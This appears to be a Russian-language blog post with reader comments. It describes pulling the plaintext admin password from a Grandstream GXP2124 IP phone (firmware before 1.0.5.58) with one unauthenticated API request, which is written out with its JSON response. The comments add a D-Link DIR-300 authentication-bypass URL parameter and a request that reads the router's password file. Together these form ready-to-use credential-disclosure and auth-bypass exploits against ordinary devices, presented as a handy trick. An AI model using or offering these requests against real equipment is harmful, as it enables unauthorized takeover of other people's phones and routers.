Узнаем пароль администратора в телефоне Grandstream GXP2124

    Сегодня столкнулся с проблемой: кто-то изменил пароль администратора к телефону. Почитав в сети информацию, сделал вывод, чтобы:

    • Изменить пароль администратора, нужен пароль администратора;
    • Сбросить телефон в заводские настройки, нужен пароль администратора;
    • Перепрошить телефон — вновь нужен тот отсутствующий пароль...

    Как же найти выход из сложившейся ситуации? Да легко!
    Для «узнавания» пароля мной был использован самый обычный браузер Google Chrome с установленным компонентов Furebug, плюс, другой телефон Grandstream GXP2124, доступ к которому у меня есть.

    image
    Дальше ход действий был следующий:

    Запускаем браузер и включаем утилиту Firebug, после чего начинаем «гулять» по различным страницам. В списке запросов был обнаружен:

    POST cgi-bin/api.values.get

    а в теле ответа числится:

    {«response»:«success», «body»:{«vendor_fullname»:«Grandstream Networks, Inc.»}}

    Листая дальше, нашел и такой запрос:
    POST cgi-bin/api-phone_operation

    в запросе которого были переданы параметры:

    cmd=extend&arg=&sid=639534b3e5a

    Что же дальше? А дальше перехожу в настройки безопасности и изменяю пароль на телефоне, доступ к которому у меня уже есть и смотрю список ответов:
    POST cgi-bin/api.values.post
    Source:
    P2=MyNewPass&:confirmAdminPwd=MyNewPass&sid=639534b3e5a

    где:
    • P2 — переданный пароль администратора;
    • confirmAdminPwd — подтверждение пароля администратора;
    • sid — текущая сессия (нам не пригодится).

    Дальше, проявив фантазию, составляем запрос вида:

    192.168.1.253/cgi-bin/api.values.get?request=P2

    где 192.168.1.253 — IP-адрес телефона.

    Отправляем и…

    … и получаем JSON-ответ вида:
    {«response»:«success», «body»:{«P2»: «adminPass»}}

    где adminPass — текущий пароль администратора.

    Profit!

    С уважением, Andrey Helldar!

    P.S.: Вышеописанная фишка срабатывает на прошивке версии до 1.0.5.58
    Конкретно было протестировано на программной версии прошивки 1.0.5.23

    Similar posts

    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More
    Ads

    Comments 11

      +2
      Похожим методом, в свое время сбрасывал пасс на d-link dir-300. Там правда достаточно было дописывать
      ?NO_NEED_AUTH=1&AUTH_GROUP=0
      в конце урла, для того, чтобы оне запрашивал авторизацию.
      Второй вариант:
      http://192.168.0.1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
      Вообще веселуха (=
        0
        А на D-Link DIR320, уж и не помню каким запросом, достал не то что пароль — весь файл конфига.
        При отправке запроса в ответ браузер файл скачивал.
          –1
          на сток прошивке не смог корректно настроить, падал wi-fi, перепрошил на DD-WRT сразу проблемы ушли с wi-fi. :)
            –1
            У DIR-300 и DIR-320 известные проблемы с Wi-Fi. Это их Ахилесова пята) Да и сами точки криво работали. DD-WRT решила все проблемы :)
        0
        Как-то давно, крутил web-панель какого-то телефона. В списке настроек было неизменяемое поле пароль «со звездочками» и для каких-то критичных изменений требовалось ввести этот пароль. А вот сам пароль уже ни кто не помнил. Открыл html… в коде странице был обычный input type=password, а в качестве value был самый настоящий пароль. :)
          0
          На D-Link'ах такое наблюдается. И не только на IP-телефонах. К ним же можно приплюсовать Planet.
            0
            D-Link-то и используется как «домашнее» железо. А дома особо пароли защищать нет нужды (конечно, за некоторыми исключениями по ситуации).
            А вот для организаций такое поведение, разумеется, не приемлемо.
              0
              Тот же «D-Link и Co» выбирают не только домашние пользователи, а и небольшие компании в целях экономии. Хотя даже дома — защита должна быть на должном уровне.
              Хотя в некоторых случаях возможность «подсмотреть» пароль в теле HTML помогало быстро перенести настройки ADSL на другое оборудование без длительного поиска нужной бумажки.
          0
          Firebug в хроме? Но зачем?
            0
            Мне через него удобней JSON-запросы отслеживать. На Firefox такой же стоит. Тут дело привычки)
            0
            Если кто знает как достать пароль на Grandstream GXP2124 с прошивкой 1.0.5.58, будьте добры поделитесь (если раньше сам не найду).
            Думаю, эта информация будет полезна сисадминам :)

            Only users with full accounts can post comments. Log in, please.